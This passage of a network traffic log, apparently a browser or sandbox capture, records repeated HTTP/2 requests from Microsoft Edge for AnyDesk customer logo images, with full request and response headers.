accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: gJtMNoMSP2P26pvPVex9nv3drl0SEh1OCvotQgvz4sucku3MN2327g==
age: 61628
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/1-f75772.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/1-f75772.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: pyNyUoAgfwPlNtOo1FNax2VEffNmSnuNWsGZiX9h_CDP-3_oPDQlFw==
age: 61627
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/2-933d52.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/2-933d52.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: BcnFBDk8J3FThu2LIWOcGvJPTwHaFdU1O5veVD7b7DhiP6wIBQHWzQ==
age: 61627
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/3-7dfd4f.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/3-7dfd4f.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: ae2GXqWDLz31STh67URu2Lj8k6BhqMjeqS1_E7x3ve3zu-Bp3HOczQ==
age: 61628
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/4-dbb9df.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/4-dbb9df.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: -DB1tBz8oVJ9IFWEtzPPSLaW-enxmsSjHTqqOQO9UuNe0MqNhsQQyQ==
age: 61628
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/5-3179d1.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/5-3179d1.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 8oIp2OhFalyVkFc_RPygwDlxy9AIezqPbw-E_hzg0urvLT247WUfrw==
age: 61627
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/6-1f1a16.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/6-1f1a16.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: pycXJuV-5dLdfI5qNR5bc4YTjVED0GU9nntDjVDxJKo3GvkUHbCzsw==
age: 61628
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/7-a49a86.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/7-a49a86.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: VrmY9jdSdGaQFLPWmRNYBqGVpwtbWU8Ufu30q5HK_VcQU_78IUONaw==
age: 61627
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/8-724f09.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/8-724f09.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 37JBYt-AJn9-uUj5wO3iXREsSgDZ8mEaZUKGffpLrIAsuyHSN3grww==
age: 61628
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/9-c52bb8.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/9-c52bb8.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: CZNaVhl6Sz13BLXAvsVvd25a-l5ZkdAQCHMFQML5pPREnbLMceMPvQ==
age: 61628
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/10-d87a03.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/10-d87a03.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 7fv1ZQ_UYDNCneeqXKudb_Lowknb_f300x_uofPONIJ4riQrdFrx0g==
age: 61628
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/11-229c76.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/11-229c76.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: LAuX5_FM33oYMTTAISUdFPlBexCXv-5T3vXk4batP0ikEZwiZVIMQQ==
age: 61629
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/12-3e4333.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/12-3e4333.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: p4mcaCzGzpl6TRKDc5AsZ3g5Y4K9D_T7Vjkq7iA-AtnUSpr7FYnEYA==
age: 61628
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/13-01dce7.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/13-01dce7.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: HtBJkGOUJzL7GoA745jNkoyFSxc-xnCqA6yX07OtT0T43Y0v7DQeHw==
age: 61628
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/14-ea62c5.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/14-ea62c5.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: SuHwZk9yDb1QKz41bW2m8fW9enHrF1BNOBD9dgKD2YB7QRLQVLRaeA==
age: 61630
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/15-e9a4dc.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/15-e9a4dc.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: P9Gzo9kXVf3YcRUIYKWhlYsCpYS_DyrswfzplEF_XDMW4ZV6tW8_HA==
age: 61629
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/16-cf5c4d.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/16-cf5c4d.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 5owPeY-EEAuguHjgooImJR9l6WMQV2fJzBMwExhtlHUmFnDd3vg7aA==
age: 61629
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/17-1b774b.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/17-1b774b.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 9pp0uV232owfPHPlVUOBeByySAaKta6XhupySNCWt6Ka4IdjBqjFgg==
age: 61629
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/18-a5a96d.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/18-a5a96d.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: k3asaLqtzoJnKsfUkoIBj3rsEEkZFLs8TPSG_hvVQFdhXUt2atGTeg==
age: 61629
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/19-8fd721.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/19-8fd721.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: Jf1Q-dkqkFmqEVm5MVePIjV5KF8pR2Y7bN2ZBsN9EbEx1OEBcC4z5Q==
age: 61629
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/20-3799e1.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/20-3799e1.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
